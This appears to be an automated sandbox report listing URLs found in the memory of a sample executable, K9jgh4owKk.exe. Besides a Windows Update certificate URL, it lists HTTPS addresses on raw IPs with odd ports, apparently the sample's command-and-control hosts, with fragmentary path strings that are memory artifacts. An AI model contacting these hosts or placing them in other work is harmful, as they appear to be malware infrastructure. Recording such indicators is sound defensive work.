Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255513353.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257742677.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.253117743.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257700106.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255628194.000000000082C000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257700106.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: K9jgh4owKk.exe, 00000000.00000003.254942420.00000000030CE000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.254958778.00000000030D7000.00000004.00000001.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?778b81b82bb2c
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255513353.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257742677.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.253117743.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257700106.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255628194.000000000082C000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126/
Source: K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126:593/
Source: K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126:593//y
Source: K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126:593/Q
Source: K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126:593/R
Source: K9jgh4owKk.exe, 00000000.00000002.511762640.0000000000895000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126:593/aphy
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255513353.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257742677.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.338303234.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.253117743.000000000082D000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342357782.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.257700106.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.255628194.000000000082C000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126:593/ll
Source: K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.70.29.126:593/lly
Source: K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172//d$
Source: K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/101.175.170:10172/L
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/101.175.170:10172/Sign
Source: K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.403679166.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/101.175.170:10172/W
Source: K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/101.175.170:10172/ication
Source: K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/5Ze(
Source: K9jgh4owKk.exe, 00000000.00000003.506114094.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/D4
Source: K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/H4
Source: K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/RY
Source: K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/iversal
Source: K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/oY
Source: K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/rsaenh.dll
Source: K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/rsaenh.dllx
Source: K9jgh4owKk.exe, 00000000.00000002.511245314.00000000007BA000.00000004.00000020.sdmp	String found in binary or memory: https://103.9.36.172/ryptprimitives.dll
Source: K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/t
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/v$
Source: K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/vider
Source: K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349116394.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/x
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://103.9.36.172/x$
Source: K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170/
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.269005674.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170/R$
Source: K9jgh4owKk.exe, 00000000.00000003.261873587.000000000082B000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170/d$
Source: K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/
Source: K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/7
Source: K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/E2
Source: K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.511479825.0000000000827000.00000004.00000020.sdmp, K9jgh4owKk.exe, 00000000.00000003.506063959.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/H
Source: K9jgh4owKk.exe, 00000000.00000003.338347874.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.349485775.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.336677145.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444272579.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498872671.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.506114094.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000002.513180409.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.356894421.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.342457886.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491355139.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437583136.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/J2
Source: K9jgh4owKk.exe, 00000000.00000003.396193564.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430727069.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437511417.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.444196322.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/L
Source: K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/Q
Source: K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/S2
Source: K9jgh4owKk.exe, 00000000.00000003.282622361.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.498833996.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463782631.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476796082.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.313585698.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.483986043.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.268971889.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.297499247.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.261835900.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.304411755.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.335027531.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.328384567.0000000000827000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.491107772.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/Sign
Source: K9jgh4owKk.exe, 00000000.00000003.275885215.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/T
Source: K9jgh4owKk.exe, 00000000.00000003.356858095.0000000000827000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/W
Source: K9jgh4owKk.exe, 00000000.00000003.484043126.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/X2
Source: K9jgh4owKk.exe, 00000000.00000003.444272579.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.430945199.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.463838545.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.476853326.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.437583136.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.396300883.00000000030CD000.00000004.00000001.sdmp, K9jgh4owKk.exe, 00000000.00000003.403718756.00000000030CD000.00000004.00000001.sdmp	String found in binary or memory: https://46.101.175.170:10172/_3
